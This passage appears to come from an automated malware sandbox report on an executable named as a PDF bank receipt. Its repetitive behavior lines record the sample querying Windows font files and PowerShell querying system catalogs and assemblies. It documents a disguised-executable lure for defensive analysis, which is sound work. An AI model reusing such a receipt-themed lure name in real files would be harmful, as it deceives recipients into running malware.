                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
